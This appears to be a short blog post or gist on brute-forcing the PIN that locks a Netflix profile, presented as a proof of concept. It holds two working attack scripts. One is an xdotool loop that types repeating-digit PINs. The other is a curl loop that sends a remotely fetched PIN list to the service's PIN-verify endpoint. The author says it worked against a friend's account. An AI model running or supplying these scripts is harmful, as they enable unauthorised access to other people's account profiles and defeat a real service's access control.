How to bruteforce Netflix profile PIN
This is just a proof of concept. ```fish sleep 3; for i in (seq 0 99); set pin (printf '%02d%02d' $i $i); for pd in (echo $pin | fold -w1); xdotool type $pd; sleep 0.05; end; sleep .5; echo $pin; end ``` Netflix is smart enough (I guess) to somehow throttle the input handling to try to mess things up if bruteforce is detected. The above code only performs bruteforce for repeating 2 digits (e.g. 1919, 1717). I think the pattern is common for Netflix profiles (*why would anyone pick a hard pin combo just to watch a movie?*). Tested on my friend's Netflix lol (hi zes) UPDATE: I just read [this]( I tried it, and it worked. It works even better(?). My command is something like: ```sh while read -r pin; do printf "$pin -- "; curl '' [LONG PASTED CURL COMMAND FROM CHROME DEVTOOLS] --data-raw '{"pin":"'$pin'","action":"verify","guid":"hehe","authURL":"hehe.hehe="}' -w '%{http_code}\n'; done < <(curl -s '') ``` I tried similar technique few months ago but it didn't work -- must've missed something.Created: 2024-10-18 13:21:42, Updated: 2024-11-11 18:51:23, ID: 1b11d9c2-49ca-4b7e-a5e9-78f3fa47df2d